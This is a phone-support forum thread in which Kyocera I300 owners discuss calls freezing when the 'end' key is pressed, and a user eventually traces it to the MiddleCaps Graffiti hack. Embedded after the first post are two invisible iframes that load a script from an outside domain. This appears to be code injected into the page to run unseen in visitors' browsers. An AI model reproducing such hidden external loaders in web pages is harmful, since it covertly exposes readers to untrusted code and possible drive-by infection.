+ Reply to Thread

Thread: crash on end

crash on end

hi.

havent seen any body complain of this, but thought id ask.

my phone usually locks up if i am in a call, want to end it and hit the "end" key on the keypad. the first week or two that i had the phone, it happened 100% of the time. now, it seems to be more like 75% of the time.

i was kind of upset about it until i figured out that it is just as easy to end calls by hitting the phone button on the right side.

Now i am only annoyed the few occasions i reflexively stab at the end key before remembering the problem.

anybody else see this problem?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

It seems that most of the internal problems resulting in button failure is due to program interference. What applications do you have installed on your I300?

Administrator

Arrow

yes that could be the culprit...

i have not expericned that..

some of your apps (or just one) may be causing this...

I don't know about a crash, but I know that when I hit the "end" key the phone is unresponsive for 30-40 seconds sometimes; but always recovers.
    -mark

do you have any type of app that alters how you input data into the I300, such as the ScreenWrite hack (this allows you to use the entire screen as the graffiti area when inputting data). This hack in particular does cause errors in the phone app, ie. if you touch anywhere where there isnt a button near the top of the screen, the phone automatically holds down either button 7,8 or 9 for like 10 seconds. Try doing the warm reset to release all hacks from the phone, make a call and see if it works then. this is just a guess...

Unhappy Any solutions to the problem yet?

If you have found the cause for this problem, please let me know. For some reason, my phone has just recently had this problem every time. I would let it sit, just in case- with high hopes in mind, for nearly five minutes a couple times...but to no avail. I have no problem hitting the phone power button, however this problem arises once again when friends use it, and they either forget to not do as I instructed them, or I don't have a chance to warn them in time. I tried disabling all my hacks, but still the same problem. Any suggestions or solutions?

hi, yah, i came up with a rather ingenius solution - i stopped hitting the end button, AND i started saying to friends about to use the phone "Don't hit the end button when you are done".

sorry i'm not more help. I had intended to be systematic about it and uninstall everything and then reinstall apps one by one until the problem returned, but somehow i never found the time.

I'll just do the same...

I'm sure it'll become a habit if I just keep telling everyone to "NOT PUSH END!" Thanks- and I, too, haven't the time to reinstall ALL the programs, considering I've never had more than 2.5 Mb free since the first day I got the phone.

If anyone finds a solution who is having a similar problem, could you please keep me posted on how to solve it?

Administrator

Arrow

well.. obvious question come to my mind... and weve all heard them before...

did any of you sync your phone to any old palm data...

did you install any programs prior to this happeneing?

are you running any programs in the background when your in a call?

i have not had this problem yet myself....

Re: Any solutions to the problem yet?

I started to get this problem as soon as I installed MiddleCaps Hack on my phone. It was the latest version at the time ( 2 weeks ago). The moment I disabled the hack, the problem went away. If I enabled it, the problem came back. So I got rid of it and have had no problems since.

I don't know If you are running it or any similar programs, but this is where I would check first.

Originally posted by nahum
    If you have found the cause for this problem, please let me know. For some reason, my phone has just recently had this problem every time. I would let it sit, just in case- with high hopes in mind, for nearly five minutes a couple times...but to no avail. I have no problem hitting the phone power button, however this problem arises once again when friends use it, and they either forget to not do as I instructed them, or I don't have a chance to warn them in time. I tried disabling all my hacks, but still the same problem. Any suggestions or solutions?

Talking And it's settled!

Draftwood- awesome! Thanks for the advice. I just deleted middlecaps, and the problem is solved!
    Thanks for everyone's suggestions, as this continues to be the most informative, courteous and responsive forum yet!

Re: And it's settled!

No problem. Glad to be of service. I hope that the author is able to fix the problem with that hack. It is very useful for Graffiti entry.

Originally posted by nahum
    Draftwood- awesome! Thanks for the advice. I just deleted middlecaps, and the problem is solved!
    Thanks for everyone's suggestions, as this continues to be the most informative, courteous and responsive forum yet!